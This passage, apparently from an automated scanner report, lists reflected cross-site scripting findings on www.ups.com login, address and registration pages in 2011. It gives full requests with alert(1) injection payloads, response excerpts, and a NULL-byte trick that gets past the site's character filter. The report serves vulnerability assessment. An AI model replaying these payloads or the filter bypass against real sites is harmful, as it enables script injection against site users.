actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspref82b5
...[SNIP]...

1.428. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 482d2"%20a%3db%2082ed3444b68 was submitted in the REST URL parameter 2. This input was echoed as 482d2" a=b 82ed3444b68 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref482d2"%20a%3db%2082ed3444b68 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:26 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44507

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myWorkspace/wspref482d2" a=b 82ed3444b68">
...[SNIP]...

1.429. https://www.ups.com/myWorkspace/wspref [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faefa'%3b3a06bbe69ac was submitted in the REST URL parameter 2. This input was echoed as faefa';3a06bbe69ac in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspreffaefa'%3b3a06bbe69ac HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:29 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44423

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
69ac';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myWorkspace/wspreffaefa';3a06bbe69ac';
actionUrl = "/one-to-one/login?ID=100&loc=
...[SNIP]...

1.430. https://www.ups.com/myWorkspace/wspref [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00cd059"><script>alert(1)</script>d77ec82d71c was submitted in the loc parameter. This input was echoed as cd059"><script>alert(1)</script>d77ec82d71c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%00cd059"><script>alert(1)</script>d77ec82d71c&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15096







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_cd059"><script>alert(1)</script>d77ec82d71c&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_cd059%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bd77ec82d71c%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.431. https://www.ups.com/myWorkspace/wspref [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0010244'-alert(1)-'35d1037df28 was submitted in the loc parameter. This input was echoed as 10244'-alert(1)-'35d1037df28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%0010244'-alert(1)-'35d1037df28&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14391







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_10244'-alert(1)-'35d1037df28';
actionUrl = "/one-to-one/login?ID=100&loc="
...[SNIP]...

1.432. https://www.ups.com/myWorkspace/wspref [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myWorkspace/wspref

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %0091f4c</script><script>alert(1)</script>899bae98079 was submitted in the loc parameter. This input was echoed as 91f4c</script><script>alert(1)</script>899bae98079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myWorkspace/wspref?loc=en_US%0091f4c</script><script>alert(1)</script>899bae98079&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15217







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script><script>alert(1)</script>899bae98079';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_91f4c</script>
...[SNIP]...

1.433. https://www.ups.com/myups/addresses [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 88949%0abe6574ffdd3 was submitted in the REST URL parameter 2. This input was echoed as 88949
be6574ffdd3 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses88949%0abe6574ffdd3 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:33 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44458

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + 'https://www.ups.com/myups/addresses88949
be6574ffdd3?appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addres
...[SNIP]...

1.434. https://www.ups.com/myups/addresses [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 94431'%3b510e598237 was submitted in the REST URL parameter 2. This input was echoed as 94431';510e598237 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses94431'%3b510e598237 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44464

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
pid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/myups/addresses94431';510e598237?appid=IMS';
actionUrl = "/one-to-one/l
...[SNIP]...

1.435. https://www.ups.com/myups/addresses [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5da4"%20a%3db%20f7ea2fc3fef was submitted in the REST URL parameter 2. This input was echoed as e5da4" a=b f7ea2fc3fef in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addressese5da4"%20a%3db%20f7ea2fc3fef HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:28 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 44559

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<input type="Hidden" id="cclamp_sreturn" name="sret" value="https://www.ups.com/myups/addressese5da4" a=b f7ea2fc3fef?appid=IMS">
...[SNIP]...

1.436. https://www.ups.com/myups/addresses [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript rest-of-line comment. The payload %00ec2ae</script><script>alert(1)</script>5826b439ddd was submitted in the loc parameter. This input was echoed as ec2ae</script><script>alert(1)</script>5826b439ddd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00ec2ae</script><script>alert(1)</script>5826b439ddd&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15339







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
"";
theForm.elements['uid'].value=uidField;

if (theForm.elements['bean.autopop'].checked)
{

//actionUrl = ssoLoginUrl + "1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae</script><script>alert(1)</script>5826b439ddd&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_ec2ae
...[SNIP]...

1.437. https://www.ups.com/myups/addresses [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of the loc request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00d4c38'-alert(1)-'57345105a30 was submitted in the loc parameter. This input was echoed as d4c38'-alert(1)-'57345105a30 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00d4c38'-alert(1)-'57345105a30&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:12 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14513







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
05a30&appid=IMS';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + '/myups/info/home?loc=en_US_d4c38'-alert(1)-'57345105a30&appid=IMS';
actionUrl = "/one-to-on
...[SNIP]...

1.438. https://www.ups.com/myups/addresses [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myups/addresses

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00f1aca"><script>alert(1)</script>b1110c7fd4f was submitted in the loc parameter. This input was echoed as f1aca"><script>alert(1)</script>b1110c7fd4f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /myups/addresses?loc=en_US%00f1aca"><script>alert(1)</script>b1110c7fd4f&WT.svl=PNRO_L1 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:09 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 15218







<body onload="document.LoginPage.elements['bean.uid'].focus()"/>

<S
...[SNIP]...
<a href="/myups/forgotpassword?loc=en_US_f1aca"><script>alert(1)</script>b1110c7fd4f&returnto=%2Fmyups%2Ffinishlogin%3Floc%3Den_US_f1aca%26quot%3B%26gt%3B%26lt%3Bscript%26gt%3Balert%281%29%26lt%3B%2Fscript%26gt%3Bb1110c7fd4f%26amp%3Bauto%3D0%26amp%3Breturnto%3D%2Fmyups%2Finfo%2Fhome%3
...[SNIP]...

1.439. https://www.ups.com/myups/forgotpassword [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/myups/forgotpassword

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00c39c0"><script>alert(1)</script>9c8c2a16b70 was submitted in the loc parameter. This input was echoed as c39c0"><script>alert(1)</script>9c8c2a16b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /myups/forgotpassword?loc=en_US%00c39c0"><script>alert(1)</script>9c8c2a16b70 HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:03 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_c39c0"><script>alert(1)</script>9c8c2a16b70.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.440. https://www.ups.com/one-to-one/forgot [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/one-to-one/forgot

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %002da2b"><script>alert(1)</script>1d4bc2b1a72 was submitted in the loc parameter. This input was echoed as 2da2b"><script>alert(1)</script>1d4bc2b1a72 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /one-to-one/forgot?loc=en_US%002da2b"><script>alert(1)</script>1d4bc2b1a72&WT.svl=SubNav HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:10 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 30759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_2da2b"><script>alert(1)</script>1d4bc2b1a72.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.441. https://www.ups.com/one-to-one/register [loc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	https://www.ups.com
Path:	/one-to-one/register

Issue detail

The value of the loc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0062e6e"><script>alert(1)</script>1d53815f05 was submitted in the loc parameter. This input was echoed as 62e6e"><script>alert(1)</script>1d53815f05 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Request

GET /one-to-one/register?sysid=myups&lang=en&langc=US&loc=en_US%0062e6e"><script>alert(1)</script>1d53815f05 HTTP/1.1
Host: www.ups.com
Connection: keep-alive
Referer: http://www.ups.com/?Site=Corporate&cookie=us_en_home&inputImgTag=&setCookie=yes
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906

Response

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:17:18 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Keep-Alive: timeout=65
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 32223

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
<script src="/assets/calendar/201001_02_00/calendar_201001_02_00_en_US_62e6e"><script>alert(1)</script>1d53815f05.obf.cache.js" type="text/javascript" charset="utf-8">
...[SNIP]...

1.442. https://www.ups.com/osa/orderSupplies [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f1c2b'%3b9f6735610f2 was submitted in the REST URL parameter 1. This input was echoed as f1c2b';9f6735610f2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /osaf1c2b'%3b9f6735610f2/orderSupplies HTTP/1.1
Host: www.ups.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: webappcommon.cclamp.usb.acceptsCookie=Yes; defaultHome=us_en_home|1297646118906;

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 14 Feb 2011 01:26:31 GMT
Server: Apache
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 40992

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">

<HTML>

<HEAD>
<META NAME="DCSext.pgf_Site" CONTENT="Country">
<META NAME="DCSext.pCC" CONTENT="US">
<META NAME="DCSex
...[SNIP]...
Supplies?appid=WBSO';
actionUrl = "/one-to-one/login?ID=100&loc=" + theForm.elements['loc'].value;
returnToField = "/myups/finishlogin?auto=1" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
}
else
{

//actionUrl = ssoLoginUrl + "0" + "&returnto=" + 'https://www.ups.com/osaf1c2b';9f6735610f2/orderSupplies?appid=WBSO';
actionU
...[SNIP]...

1.443. https://www.ups.com/osa/orderSupplies [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	https://www.ups.com
Path:	/osa/orderSupplies

Issue detail

